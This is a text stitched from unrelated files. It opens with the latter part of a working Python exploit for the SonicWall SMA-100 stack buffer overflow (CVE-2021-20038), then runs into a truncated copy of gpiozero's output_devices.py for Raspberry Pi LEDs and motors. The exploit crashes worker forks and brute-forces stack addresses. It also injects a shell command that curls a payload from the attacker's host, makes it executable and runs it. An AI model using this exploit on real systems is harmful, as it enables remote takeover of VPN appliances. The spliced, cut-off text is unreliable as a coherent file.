It can also be successful if it dereferences to $ebp+12+0x50 since the data is # repeated 0x50 after the first one. As such, if [$ebp+8] dereferences to the next address or # 0x50+4, either way we win. So we can exclude every 0x50th guess. ## def filter_addresses(address_list): return_list = [] visited_set = set() for address in address_list: if address not in visited_set: return_list.append(address) visited_set.add(address) visited_set.add(address - 0x50) visited_set.add(address + 0x170) visited_set.add(address + 0x1c0) return return_list ## # Sends a payload that will crash a fork. Loop and do it 64 times # for good measure. ## def send_crashes(host, port): for x in range(64): request = b'GET /badblood?' + (b'a'*400) + b'\r\n\r\n' ssl_request(args.rhost, args.rport, request) ## # Adjust the start address so that it will point to the # second address. URL encode. ## def test_and_encode_first_address(address): address -= 0x110 address += 4 one = (address >> 24) & 0x000000ff two = (address >> 16) & 0x000000ff three = (address >> 8) & 0x000000ff four = (address & 0x000000ff) if one == 0 or two == 0 or three == 0 or four == 0: return "" addr_one = (b"%" + str.encode('{:02x}'.format(four, 'x')) + b"%" + str.encode('{:02x}'.format(three, 'x')) + b"%" + str.encode('{:02x}'.format(two, 'x')) + b"%" + str.encode('{:02x}'.format(one, 'x'))) return addr_one ## # Adjusts the start address so that it will point to the call to # system, url enocde, and check for invalid values. ## def test_and_encode_second_address(address): address += 8 one = (address >> 24) & 0x000000ff two = (address >> 16) & 0x000000ff three = (address >> 8) & 0x000000ff four = (address & 0x000000ff) if one == 0x28 or two == 0x28 or three == 0x28 or four == 0x28: # shell metacharacters break the payload :grimacing: return "" addr_two = (b"%" + str.encode('{:02x}'.format(four, 'x')) + b"%" + str.encode('{:02x}'.format(three, 'x')) + b"%" + str.encode('{:02x}'.format(two, 'x')) + b"%" + str.encode('{:02x}'.format(one, 'x'))) return addr_two ## # Generic open socket, do ssl, send data, close socket. # Don't wait around for a response ## def ssl_request(host, addr, request): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) wrappedSocket = ssl.wrap_socket(sock) wrappedSocket.connect((host, addr)) wrappedSocket.send(request) wrappedSocket.recv(1) wrappedSocket.close() ## # Handles a single HTTP request before killing the program. ## def serve_once(httpd): httpd.handle_request() print('[*] Now we got bad blood. Hey! 🦞') sys.stdout = open(os.devnull, "w") # hang the connection and ensure the download happens time.sleep(5) os._exit(1) ## # Formats the exploit given the address, etc. and then shoves it out an SSL connection ## def send_exploit(address, rhost, rport, lhost, system_addr, rhostname): encoded_addr_one = test_and_encode_first_address(address) if encoded_addr_one == "": return encoded_addr_two = test_and_encode_second_address(address) if encoded_addr_two == "": return # the only variable sized item in the "shell_cmd" below is the lhost. because # alignment is so important to the final payload, we have to pad out command. pad = 'a' * (15 - len(lhost)) # the shell_cmd that will get executed. 
    # Basic callback, download, chmod, and execute
    shell_cmd = ";{curl," + lhost + ":1270,-o,/tmp/a};{chmod,+x,/tmp/a};/tmp/a;" + pad
    exploit = encoded_addr_one + encoded_addr_two + encoded_addr_two + system_addr + shell_cmd.encode('utf-8')

    # adjust the trailing z's to account for the hostname size and IP address size
    spray_pray = b"/" + (exploit*2) + b"?" + (b'z'*(476-len(lhost)-len(rhostname)))
    request = b'GET ' + spray_pray + b'\r\n\r\n'
    ssl_request(rhost, rport, request)

# The httpd executable does not have a randomized base so we'll
# jump through that in order to reach system(). Below are the
# supported versions and the httpd address.
version_dict = {
    "10.2.1.2-24sv": b"%08%b7%06%08",
    "10.2.1.1-19sv": b"%64%b8%06%08",
    "10.2.1.0-17sv": b"%64%b8%06%08"
}

# Dump the supported version dict to screen
def print_supported_versions():
    print("[+] Supported versions:")
    for key, value in version_dict.items():
        print("\t- %s" % key)

if __name__ == '__main__':
    do_banner()

    top_parser = argparse.ArgumentParser(description='SonicWall SMA-100 Series Stack-Buffer Overflow Exploit (CVE-2021-20038)')
    required_args = top_parser.add_argument_group('required arguments')
    required_args.add_argument('--rhost', action="store", dest="rhost", required=True, help="The IPv4 address to connect to")
    required_args.add_argument('--rport', action="store", dest="rport", type=int, help="The port to connect to", default="443")
    required_args.add_argument('--lhost', action="store", dest="lhost", required=True, help="The address to connect back to")
    required_args.add_argument('--rversion', action="store", dest="rversion", help="The version of the remote target")
    required_args.add_argument('--rhostname', action="store", dest="rhostname", help="The hostname of the remote target", default="sslvpn")
    top_parser.add_argument('--supported-versions', action="store_true", dest="supported_versions", help="The list of supported SMA-100 versions")
    top_parser.add_argument('--workers', action="store", dest="workers", type=int, required=False, help="The number of workers to spew the exploit", default=4)
    top_parser.add_argument('--nocrash', action="store_true", dest="nocrash", help="Stops the exploit from sending a series of crash payloads to start")
    top_parser.add_argument('--enable-stderr', action="store_true", dest="enablestderr", help="Enable stderr for debugging")
    top_parser.add_argument('--addr', action="store", dest="addr", type=int, required=False, help="Test only. If you know the crash address, go wild.", default=0)
    top_parser.add_argument('--top-addr', action="store", dest="top_addr", type=int, required=False, help="Test only. If you know the stack's top address, go wild.", default=0)
    args = top_parser.parse_args()

    if args.supported_versions == True:
        print_supported_versions()
        sys.exit(1)

    if args.rversion not in version_dict:
        print("[-] User specified an unsupported SMA-100 version. Exiting.")
        sys.exit(1)

    if len(args.lhost) > 15:
        print('[-] lhost must be less than 16 bytes. Alignment issues, sorry!')
        sys.exit(1)

    # Spin up a server for the exploit to call back to
    print('[+] Spinning up HTTP server')
    httpd = HTTPServer((args.lhost, 1270), PayloadServer)
    httpd_thread = Thread(target=serve_once, args=(httpd, ))
    httpd_thread.setDaemon(True)
    httpd_thread.start()

    # Generate the addresses we'll craft into the exploit payload
    if args.addr != 0:
        print('[+] User provided the crash address: %lx' % args.addr)
        all_addresses = [ args.addr ]
    elif args.top_addr != 0:
        print('[+] User provided the top stack address: %lx' % args.top_addr)
        top_addresses = [ args.top_addr ]
        all_addresses = generate_all_addresses(top_addresses, 0x800, 0x2800)
        print('[+] Generated %u total addresses to search' % len(all_addresses))
    else:
        print('[+] User did not provide an address. We\'ll guess it.')
        top_addresses = generate_stack_top_addresses()
        print('[+] Generated %u base addresses' % len(top_addresses))
        all_addresses = generate_all_addresses(top_addresses, 0x800, 0x2800)
        print('[+] Generated %u total addresses to search' % len(all_addresses))

    # Filter the addresses. Our payload guesses multiple addresses at once
    print('[+] Filtering addresses for double visits (thanks awesome payload!)')
    all_addresses = filter_addresses(all_addresses)
    print('[+] Filtered down to %u total addresses to search' % len(all_addresses))

    if args.nocrash == False:
        # Send 64 requests to crash all the forks. That's probably enough.
        print('[+] Crashing all forks to reset stack to a semi-predictable state')
        send_crashes(args.rhost, args.rport)
        print('[+] Crashing complete. Good job. Let\'s go do work.')
    else:
        print('[!] Skipping fork crashing at user request.')

    if args.enablestderr == False:
        print('[+] Disabling stderr')
        sys.stderr = open(os.devnull, "w")

    print('[+] Spawning %u workers' % args.workers)
    pool = Pool(processes=args.workers)
    address_count = len(all_addresses)

    print('[+] Attempting to exploit the remote server. This might take quite some time. :eek:')
    for i, _ in enumerate(pool.imap(partial(send_exploit, rhost=args.rhost, rport=args.rport, lhost=args.lhost,
            system_addr=version_dict[args.rversion], rhostname=args.rhostname), all_addresses)):
        print('\r[%] Addresses Tested: {0:.0f}%'.format((i/address_count) * 100), end='')

    print('\n[!] Done guessing addresses. Let us sleep for a few seconds and hope for success')
    time.sleep(3)
    print('[?] If you are reading this, the exploit likely failed.')
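# ----------------------------------------------------------------------------
# Illustrative sketch (not part of the original exploit above): a minimal,
# standalone demonstration of the little-endian percent-encoding performed by
# test_and_encode_first_address()/test_and_encode_second_address(). The helper
# name and the sample addresses are made up for illustration only.
def _demo_percent_encode_le(address):
    """Split a 32-bit address into bytes and percent-encode it little-endian."""
    byte_values = [(address >> shift) & 0xff for shift in (0, 8, 16, 24)]
    if 0 in byte_values:
        return b""  # a NUL byte would truncate the payload, so reject it
    return b"".join(b"%" + ('%02x' % value).encode() for value in byte_values)

# _demo_percent_encode_le(0xbf812340) -> b'%40%23%81%bf'
# _demo_percent_encode_le(0xbf810040) -> b'' (contains a zero byte)
# ----------------------------------------------------------------------------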
output_devices.py
from __future__ import ( unicode_literals, print_function, absolute_import, division, ) from threading import Lock from itertools import repeat, cycle, chain from colorzero import Color, Red, Green, Blue from collections import OrderedDict from .exc import OutputDeviceBadValue, GPIOPinMissing from .devices import GPIODevice, Device, CompositeDevice from .mixins import SourceMixin from .threads import GPIOThread class OutputDevice(SourceMixin, GPIODevice): """ Represents a generic GPIO output device. This class extends :class:`GPIODevice` to add facilities common to GPIO output devices: an :meth:`on` method to switch the device on, a corresponding :meth:`off` method, and a :meth:`toggle` method. :param int pin: The GPIO pin (in BCM numbering) that the device is connected to. If this is ``None`` a :exc:`GPIOPinMissing` will be raised. :param bool active_high: If ``True`` (the default), the :meth:`on` method will set the GPIO to HIGH. If ``False``, the :meth:`on` method will set the GPIO to LOW (the :meth:`off` method always does the opposite). :param bool initial_value: If ``False`` (the default), the device will be off initially. If ``None``, the device will be left in whatever state the pin is found in when configured for output (warning: this can be on). If ``True``, the device will be switched on initially. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ def __init__( self, pin=None, active_high=True, initial_value=False, pin_factory=None): super(OutputDevice, self).__init__(pin, pin_factory=pin_factory) self._lock = Lock() self.active_high = active_high if initial_value is None: self.pin.function = 'output' else: self.pin.output_with_state(self._value_to_state(initial_value)) def _value_to_state(self, value): return bool(self._active_state if value else self._inactive_state) def _write(self, value): try: self.pin.state = self._value_to_state(value) except AttributeError: self._check_open() raise def on(self): """ Turns the device on. """ self._write(True) def off(self): """ Turns the device off. """ self._write(False) def toggle(self): """ Reverse the state of the device. If it's on, turn it off; if it's off, turn it on. """ with self._lock: if self.is_active: self.off() else: self.on() @property def value(self): """ Returns ``True`` if the device is currently active and ``False`` otherwise. Setting this property changes the state of the device. """ return super(OutputDevice, self).value @value.setter def value(self, value): self._write(value) @property def active_high(self): """ When ``True``, the :attr:`value` property is ``True`` when the device's :attr:`pin` is high. When ``False`` the :attr:`value` property is ``True`` when the device's pin is low (i.e. the value is inverted). This property can be set after construction; be warned that changing it will invert :attr:`value` (i.e. changing this property doesn't change the device's pin state - it just changes how that state is interpreted). """ return self._active_state @active_high.setter def active_high(self, value): self._active_state = True if value else False self._inactive_state = False if value else True def __repr__(self): try: return '<gpiozero.%s object on pin %r, active_high=%s, is_active=%s>' % ( self.__class__.__name__, self.pin, self.active_high, self.is_active) except: return super(OutputDevice, self).__repr__() class DigitalOutputDevice(OutputDevice): """ Represents a generic output device with typical on/off behaviour. 
This class extends :class:`OutputDevice` with a :meth:`blink` method which uses an optional background thread to handle toggling the device state without further interaction. """ def __init__( self, pin=None, active_high=True, initial_value=False, pin_factory=None): self._blink_thread = None self._controller = None super(DigitalOutputDevice, self).__init__( pin, active_high, initial_value, pin_factory=pin_factory ) @property def value(self): return self._read() @value.setter def value(self, value): self._stop_blink() self._write(value) def close(self): self._stop_blink() super(DigitalOutputDevice, self).close() def on(self): self._stop_blink() self._write(True) def off(self): self._stop_blink() self._write(False) def blink(self, on_time=1, off_time=1, n=None, background=True): """ Make the device turn on and off repeatedly. :param float on_time: Number of seconds on. Defaults to 1 second. :param float off_time: Number of seconds off. Defaults to 1 second. :param int n: Number of times to blink; ``None`` (the default) means forever. :param bool background: If ``True`` (the default), start a background thread to continue blinking and return immediately. If ``False``, only return when the blink is finished (warning: the default value of *n* will result in this method never returning). """ self._stop_blink() self._blink_thread = GPIOThread( target=self._blink_device, args=(on_time, off_time, n) ) self._blink_thread.start() if not background: self._blink_thread.join() self._blink_thread = None def _stop_blink(self): if getattr(self, '_controller', None): self._controller._stop_blink(self) self._controller = None if getattr(self, '_blink_thread', None): self._blink_thread.stop() self._blink_thread = None def _blink_device(self, on_time, off_time, n): iterable = repeat(0) if n is None else repeat(0, n) for _ in iterable: self._write(True) if self._blink_thread.stopping.wait(on_time): break self._write(False) if self._blink_thread.stopping.wait(off_time): break class LED(DigitalOutputDevice): """ Extends :class:`DigitalOutputDevice` and represents a light emitting diode (LED). Connect the cathode (short leg, flat side) of the LED to a ground pin; connect the anode (longer leg) to a limiting resistor; connect the other side of the limiting resistor to a GPIO pin (the limiting resistor can be placed either side of the LED). The following example will light the LED:: from gpiozero import LED led = LED(17) led.on() :param int pin: The GPIO pin which the LED is attached to. See :ref:`pin-numbering` for valid pin numbers. :param bool active_high: If ``True`` (the default), the LED will operate normally with the circuit described above. If ``False`` you should wire the cathode to the GPIO pin, and the anode to a 3V3 pin (via a limiting resistor). :param bool initial_value: If ``False`` (the default), the LED will be off initially. If ``None``, the LED will be left in whatever state the pin is found in when configured for output (warning: this can be on). If ``True``, the LED will be switched on initially. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ pass LED.is_lit = LED.is_active class Buzzer(DigitalOutputDevice): """ Extends :class:`DigitalOutputDevice` and represents a digital buzzer component. Note that this interface is only capable of simple on/off commands, and is not capable of playing a variety of tones. Connect the cathode (negative pin) of the buzzer to a ground pin; connect the other side to any GPIO pin. 
The following example will sound the buzzer:: from gpiozero import Buzzer bz = Buzzer(3) bz.on() :param int pin: The GPIO pin which the buzzer is attached to. See :ref:`pin-numbering` for valid pin numbers. :param bool active_high: If ``True`` (the default), the buzzer will operate normally with the circuit described above. If ``False`` you should wire the cathode to the GPIO pin, and the anode to a 3V3 pin. :param bool initial_value: If ``False`` (the default), the buzzer will be silent initially. If ``None``, the buzzer will be left in whatever state the pin is found in when configured for output (warning: this can be on). If ``True``, the buzzer will be switched on initially. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ pass Buzzer.beep = Buzzer.blink class PWMOutputDevice(OutputDevice): """ Generic output device configured for pulse-width modulation (PWM). :param int pin: The GPIO pin which the device is attached to. See :ref:`pin-numbering` for valid pin numbers. :param bool active_high: If ``True`` (the default), the :meth:`on` method will set the GPIO to HIGH. If ``False``, the :meth:`on` method will set the GPIO to LOW (the :meth:`off` method always does the opposite). :param float initial_value: If ``0`` (the default), the device's duty cycle will be 0 initially. Other values between 0 and 1 can be specified as an initial duty cycle. Note that ``None`` cannot be specified (unlike the parent class) as there is no way to tell PWM not to alter the state of the pin. :param int frequency: The frequency (in Hz) of pulses emitted to drive the device. Defaults to 100Hz. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ def __init__( self, pin=None, active_high=True, initial_value=0, frequency=100, pin_factory=None): self._blink_thread = None self._controller = None if not 0 <= initial_value <= 1: raise OutputDeviceBadValue("initial_value must be between 0 and 1") super(PWMOutputDevice, self).__init__( pin, active_high, initial_value=None, pin_factory=pin_factory ) try: # XXX need a way of setting these together self.pin.frequency = frequency self.value = initial_value except: self.close() raise def close(self): try: self._stop_blink() except AttributeError: pass try: self.pin.frequency = None except AttributeError: # If the pin's already None, ignore the exception pass super(PWMOutputDevice, self).close() def _state_to_value(self, state): return float(state if self.active_high else 1 - state) def _value_to_state(self, value): return float(value if self.active_high else 1 - value) def _write(self, value): if not 0 <= value <= 1: raise OutputDeviceBadValue("PWM value must be between 0 and 1") super(PWMOutputDevice, self)._write(value) @property def value(self): """ The duty cycle of the PWM device. 0.0 is off, 1.0 is fully on. Values in between may be specified for varying levels of power in the device. """ return self._read() @value.setter def value(self, value): self._stop_blink() self._write(value) def on(self): self._stop_blink() self._write(1) def off(self): self._stop_blink() self._write(0) def toggle(self): """ Toggle the state of the device. If the device is currently off (:attr:`value` is 0.0), this changes it to "fully" on (:attr:`value` is 1.0). If the device has a duty cycle (:attr:`value`) of 0.1, this will toggle it to 0.9, and so on. 
""" self._stop_blink() self.value = 1 - self.value @property def is_active(self): """ Returns ``True`` if the device is currently active (:attr:`value` is non-zero) and ``False`` otherwise. """ return self.value != 0 @property def frequency(self): """ The frequency of the pulses used with the PWM device, in Hz. The default is 100Hz. """ return self.pin.frequency @frequency.setter def frequency(self, value): self.pin.frequency = value def blink( self, on_time=1, off_time=1, fade_in_time=0, fade_out_time=0, n=None, background=True): """ Make the device turn on and off repeatedly. :param float on_time: Number of seconds on. Defaults to 1 second. :param float off_time: Number of seconds off. Defaults to 1 second. :param float fade_in_time: Number of seconds to spend fading in. Defaults to 0. :param float fade_out_time: Number of seconds to spend fading out. Defaults to 0. :param int n: Number of times to blink; ``None`` (the default) means forever. :param bool background: If ``True`` (the default), start a background thread to continue blinking and return immediately. If ``False``, only return when the blink is finished (warning: the default value of *n* will result in this method never returning). """ self._stop_blink() self._blink_thread = GPIOThread( target=self._blink_device, args=(on_time, off_time, fade_in_time, fade_out_time, n) ) self._blink_thread.start() if not background: self._blink_thread.join() self._blink_thread = None def pulse(self, fade_in_time=1, fade_out_time=1, n=None, background=True): """ Make the device fade in and out repeatedly. :param float fade_in_time: Number of seconds to spend fading in. Defaults to 1. :param float fade_out_time: Number of seconds to spend fading out. Defaults to 1. :param int n: Number of times to pulse; ``None`` (the default) means forever. :param bool background: If ``True`` (the default), start a background thread to continue pulsing and return immediately. If ``False``, only return when the pulse is finished (warning: the default value of *n* will result in this method never returning). """ on_time = off_time = 0 self.blink( on_time, off_time, fade_in_time, fade_out_time, n, background ) def _stop_blink(self): if self._controller: self._controller._stop_blink(self) self._controller = None if self._blink_thread: self._blink_thread.stop() self._blink_thread = None def _blink_device( self, on_time, off_time, fade_in_time, fade_out_time, n, fps=25): sequence = [] if fade_in_time > 0: sequence += [ (i * (1 / fps) / fade_in_time, 1 / fps) for i in range(int(fps * fade_in_time)) ] sequence.append((1, on_time)) if fade_out_time > 0: sequence += [ (1 - (i * (1 / fps) / fade_out_time), 1 / fps) for i in range(int(fps * fade_out_time)) ] sequence.append((0, off_time)) sequence = ( cycle(sequence) if n is None else chain.from_iterable(repeat(sequence, n)) ) for value, delay in sequence: self._write(value) if self._blink_thread.stopping.wait(delay): break class PWMLED(PWMOutputDevice): """ Extends :class:`PWMOutputDevice` and represents a light emitting diode (LED) with variable brightness. A typical configuration of such a device is to connect a GPIO pin to the anode (long leg) of the LED, and the cathode (short leg) to ground, with an optional resistor to prevent the LED from burning out. :param int pin: The GPIO pin which the LED is attached to. See :ref:`pin-numbering` for valid pin numbers. :param bool active_high: If ``True`` (the default), the :meth:`on` method will set the GPIO to HIGH. 
If ``False``, the :meth:`on` method will set the GPIO to LOW (the :meth:`off` method always does the opposite). :param float initial_value: If ``0`` (the default), the LED will be off initially. Other values between 0 and 1 can be specified as an initial brightness for the LED. Note that ``None`` cannot be specified (unlike the parent class) as there is no way to tell PWM not to alter the state of the pin. :param int frequency: The frequency (in Hz) of pulses emitted to drive the LED. Defaults to 100Hz. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ pass PWMLED.is_lit = PWMLED.is_active class RGBLED(SourceMixin, Device): """ Extends :class:`Device` and represents a full color LED component (composed of red, green, and blue LEDs). Connect the common cathode (longest leg) to a ground pin; connect each of the other legs (representing the red, green, and blue anodes) to any GPIO pins. You can either use three limiting resistors (one per anode) or a single limiting resistor on the cathode. The following code will make the LED purple:: from gpiozero import RGBLED led = RGBLED(2, 3, 4) led.color = (1, 0, 1) :param int red: The GPIO pin that controls the red component of the RGB LED. :param int green: The GPIO pin that controls the green component of the RGB LED. :param int blue: The GPIO pin that controls the blue component of the RGB LED. :param bool active_high: Set to ``True`` (the default) for common cathode RGB LEDs. If you are using a common anode RGB LED, set this to ``False``. :param tuple initial_value: The initial color for the RGB LED. Defaults to black ``(0, 0, 0)``. :param bool pwm: If ``True`` (the default), construct :class:`PWMLED` instances for each component of the RGBLED. If ``False``, construct regular :class:`LED` instances, which prevents smooth color graduations. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ def __init__( self, red=None, green=None, blue=None, active_high=True, initial_value=(0, 0, 0), pwm=True, pin_factory=None): self._leds = () self._blink_thread = None if not all(p is not None for p in [red, green, blue]): raise GPIOPinMissing('red, green, and blue pins must be provided') LEDClass = PWMLED if pwm else LED super(RGBLED, self).__init__(pin_factory=pin_factory) self._leds = tuple( LEDClass(pin, active_high, pin_factory=pin_factory) for pin in (red, green, blue) ) self.value = initial_value def close(self): if getattr(self, '_leds', None): self._stop_blink() for led in self._leds: led.close() self._leds = () super(RGBLED, self).close() @property def closed(self): return len(self._leds) == 0 @property def value(self): """ Represents the color of the LED as an RGB 3-tuple of ``(red, green, blue)`` where each value is between 0 and 1 if ``pwm`` was ``True`` when the class was constructed (and only 0 or 1 if not). For example, red would be ``(1, 0, 0)`` and yellow would be ``(1, 1, 0)``, while orange would be ``(1, 0.5, 0)``. 
""" return tuple(led.value for led in self._leds) @value.setter def value(self, value): for component in value: if not 0 <= component <= 1: raise OutputDeviceBadValue('each RGB color component must be between 0 and 1') if isinstance(self._leds[0], LED): if component not in (0, 1): raise OutputDeviceBadValue('each RGB color component must be 0 or 1 with non-PWM RGBLEDs') self._stop_blink() for led, v in zip(self._leds, value): led.value = v @property def is_active(self): """ Returns ``True`` if the LED is currently active (not black) and ``False`` otherwise. """ return self.value != (0, 0, 0) is_lit = is_active @property def color(self): """ Represents the color of the LED as a :class:`~colorzero.Color` object. """ return Color(*self.value) @color.setter def color(self, value): self.value = value @property def red(self): """ Represents the red element of the LED as a :class:`~colorzero.Red` object. """ return self.color.red @red.setter def red(self, value): self._stop_blink() r, g, b = self.value self.value = value, g, b @property def green(self): """ Represents the green element of the LED as a :class:`~colorzero.Green` object. """ return self.color.green @green.setter def green(self, value): self._stop_blink() r, g, b = self.value self.value = r, value, b @property def blue(self): """ Represents the blue element of the LED as a :class:`~colorzero.Blue` object. """ return self.color.blue @blue.setter def blue(self, value): self._stop_blink() r, g, b = self.value self.value = r, g, value def on(self): """ Turn the LED on. This equivalent to setting the LED color to white ``(1, 1, 1)``. """ self.value = (1, 1, 1) def off(self): """ Turn the LED off. This is equivalent to setting the LED color to black ``(0, 0, 0)``. """ self.value = (0, 0, 0) def toggle(self): """ Toggle the state of the device. If the device is currently off (:attr:`value` is ``(0, 0, 0)``), this changes it to "fully" on (:attr:`value` is ``(1, 1, 1)``). If the device has a specific color, this method inverts the color. """ r, g, b = self.value self.value = (1 - r, 1 - g, 1 - b) def blink( self, on_time=1, off_time=1, fade_in_time=0, fade_out_time=0, on_color=(1, 1, 1), off_color=(0, 0, 0), n=None, background=True): """ Make the device turn on and off repeatedly. :param float on_time: Number of seconds on. Defaults to 1 second. :param float off_time: Number of seconds off. Defaults to 1 second. :param float fade_in_time: Number of seconds to spend fading in. Defaults to 0. Must be 0 if ``pwm`` was ``False`` when the class was constructed (:exc:`ValueError` will be raised if not). :param float fade_out_time: Number of seconds to spend fading out. Defaults to 0. Must be 0 if ``pwm`` was ``False`` when the class was constructed (:exc:`ValueError` will be raised if not). :param tuple on_color: The color to use when the LED is "on". Defaults to white. :param tuple off_color: The color to use when the LED is "off". Defaults to black. :param int n: Number of times to blink; ``None`` (the default) means forever. :param bool background: If ``True`` (the default), start a background thread to continue blinking and return immediately. If ``False``, only return when the blink is finished (warning: the default value of *n* will result in this method never returning). 
""" if isinstance(self._leds[0], LED): if fade_in_time: raise ValueError('fade_in_time must be 0 with non-PWM RGBLEDs') if fade_out_time: raise ValueError('fade_out_time must be 0 with non-PWM RGBLEDs') self._stop_blink() self._blink_thread = GPIOThread( target=self._blink_device, args=( on_time, off_time, fade_in_time, fade_out_time, on_color, off_color, n ) ) self._blink_thread.start() if not background: self._blink_thread.join() self._blink_thread = None def pulse( self, fade_in_time=1, fade_out_time=1, on_color=(1, 1, 1), off_color=(0, 0, 0), n=None, background=True): """ Make the device fade in and out repeatedly. :param float fade_in_time: Number of seconds to spend fading in. Defaults to 1. :param float fade_out_time: Number of seconds to spend fading out. Defaults to 1. :param tuple on_color: The color to use when the LED is "on". Defaults to white. :param tuple off_color: The color to use when the LED is "off". Defaults to black. :param int n: Number of times to pulse; ``None`` (the default) means forever. :param bool background: If ``True`` (the default), start a background thread to continue pulsing and return immediately. If ``False``, only return when the pulse is finished (warning: the default value of *n* will result in this method never returning). """ on_time = off_time = 0 self.blink( on_time, off_time, fade_in_time, fade_out_time, on_color, off_color, n, background ) def _stop_blink(self, led=None): # If this is called with a single led, we stop all blinking anyway if self._blink_thread: self._blink_thread.stop() self._blink_thread = None def _blink_device( self, on_time, off_time, fade_in_time, fade_out_time, on_color, off_color, n, fps=25): # Define some simple lambdas to perform linear interpolation between # off_color and on_color lerp = lambda t, fade_in: tuple( (1 - t) * off + t * on if fade_in else (1 - t) * on + t * off for off, on in zip(off_color, on_color) ) sequence = [] if fade_in_time > 0: sequence += [ (lerp(i * (1 / fps) / fade_in_time, True), 1 / fps) for i in range(int(fps * fade_in_time)) ] sequence.append((on_color, on_time)) if fade_out_time > 0: sequence += [ (lerp(i * (1 / fps) / fade_out_time, False), 1 / fps) for i in range(int(fps * fade_out_time)) ] sequence.append((off_color, off_time)) sequence = ( cycle(sequence) if n is None else chain.from_iterable(repeat(sequence, n)) ) for l in self._leds: l._controller = self for value, delay in sequence: for l, v in zip(self._leds, value): l._write(v) if self._blink_thread.stopping.wait(delay): break class Motor(SourceMixin, CompositeDevice): """ Extends :class:`CompositeDevice` and represents a generic motor connected to a bi-directional motor driver circuit (i.e. an `H-bridge`_). Attach an `H-bridge`_ motor controller to your Pi; connect a power source (e.g. a battery pack or the 5V pin) to the controller; connect the outputs of the controller board to the two terminals of the motor; connect the inputs of the controller board to two GPIO pins. .. _H-bridge: https://en.wikipedia.org/wiki/H_bridge The following code will make the motor turn "forwards":: from gpiozero import Motor motor = Motor(17, 18) motor.forward() :param int forward: The GPIO pin that the forward input of the motor driver chip is connected to. :param int backward: The GPIO pin that the backward input of the motor driver chip is connected to. :param int enable: (Optional) The GPIO pin that enables the motor. Required for some motor controller boards. Defaults to ``None``. 
:param bool pwm: If ``True`` (the default), construct :class:`PWMOutputDevice` instances for the motor controller pins, allowing both direction and variable speed control. If ``False``, construct :class:`DigitalOutputDevice` instances, allowing only direction control. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ def __init__(self, forward=None, backward=None, enable=None, pwm=True, pin_factory=None): if not all(p is not None for p in [forward, backward]): raise GPIOPinMissing( 'forward and backward pins must be provided' ) PinClass = PWMOutputDevice if pwm else DigitalOutputDevice devices = OrderedDict(( ('forward_device', PinClass(forward)), ('backward_device', PinClass(backward)), )) if enable is not None: devices['enable_device'] = DigitalOutputDevice(enable, initial_value=True) super(Motor, self).__init__(_order=devices.keys(), **devices) @property def value(self): """ Represents the speed of the motor as a floating point value between -1 (full speed backward) and 1 (full speed forward), with 0 representing stopped. """ return self.forward_device.value - self.backward_device.value @value.setter def value(self, value): if not -1 <= value <= 1: raise OutputDeviceBadValue("Motor value must be between -1 and 1") if value > 0: try: self.forward(value) except ValueError as e: raise OutputDeviceBadValue(e) elif value < 0: try: self.backward(-value) except ValueError as e: raise OutputDeviceBadValue(e) else: self.stop() @property def is_active(self): """ Returns ``True`` if the motor is currently running and ``False`` otherwise. """ return self.value != 0 def forward(self, speed=1): """ Drive the motor forwards. :param float speed: The speed at which the motor should turn. Can be any value between 0 (stopped) and the default 1 (maximum speed) if ``pwm`` was ``True`` when the class was constructed (and only 0 or 1 if not). """ if not 0 <= speed <= 1: raise ValueError('forward speed must be between 0 and 1') if isinstance(self.forward_device, DigitalOutputDevice): if speed not in (0, 1): raise ValueError('forward speed must be 0 or 1 with non-PWM Motors') self.backward_device.off() self.forward_device.value = speed def backward(self, speed=1): """ Drive the motor backwards. :param float speed: The speed at which the motor should turn. Can be any value between 0 (stopped) and the default 1 (maximum speed) if ``pwm`` was ``True`` when the class was constructed (and only 0 or 1 if not). """ if not 0 <= speed <= 1: raise ValueError('backward speed must be between 0 and 1') if isinstance(self.backward_device, DigitalOutputDevice): if speed not in (0, 1): raise ValueError('backward speed must be 0 or 1 with non-PWM Motors') self.forward_device.off() self.backward_device.value = speed def reverse(self): """ Reverse the current direction of the motor. If the motor is currently idle this does nothing. Otherwise, the motor's direction will be reversed at the current speed. """ self.value = -self.value def stop(self): """ Stop the motor. """ self.forward_device.off() self.backward_device.off() class PhaseEnableMotor(SourceMixin, CompositeDevice): """ Extends :class:`CompositeDevice` and represents a generic motor connected to a Phase/Enable motor driver circuit; the phase of the driver controls whether the motor turns forwards or backwards, while enable controls the speed with PWM. 
The following code will make the motor turn "forwards":: from gpiozero import PhaseEnableMotor motor = PhaseEnableMotor(12, 5) motor.forward() :param int phase: The GPIO pin that the phase (direction) input of the motor driver chip is connected to. :param int enable: The GPIO pin that the enable (speed) input of the motor driver chip is connected to. :param bool pwm: If ``True`` (the default), construct :class:`PWMOutputDevice` instances for the motor controller pins, allowing both direction and variable speed control. If ``False``, construct :class:`DigitalOutputDevice` instances, allowing only direction control. :param Factory pin_factory: See :doc:`api_pins` for more information (this is an advanced feature which most users can ignore). """ def __init__(self, phase=None, enable=None, pwm=True, pin_factory=None): if not all([phase, enable]): raise GPIOPinMissing('phase and enable pins must be provided') PinClass = PWMOutputDevice if pwm else DigitalOutputDevice super(PhaseEnableMotor, self).__init__( phase_device=DigitalOutputDevice(phase, pin_factory=pin_factory), enable_device=PinClass(enable, pin_factory=pin_factory), _order=('phase_device', 'enable_device'), pin_factory=pin_factory ) @property def value(self): """ Represents the speed of the motor as a floating point value between -1 (full speed backward) and 1 (full speed forward). """ return -self.enable_device.value if self.phase_device.is_active else self.enable_device.value @value.setter def value(self, value): if not -1 <= value <= 1: raise OutputDeviceBadValue("Motor value must be between -1 and 1") if value > 0: self.forward(value) elif value < 0: self.backward(-value) else: self.stop() @property def is_active(self): """ Returns ``True`` if the motor is currently running and ``False`` otherwise. """ return self.value != 0 def forward(self, speed=1): """ Drive the motor forwards. :param float speed: The speed at which the motor should turn. Can be any value between 0 (stopped) and the default 1 (maximum speed). """ if isinstance(self.enable_device, DigitalOutputDevice): if speed not in (0, 1): raise 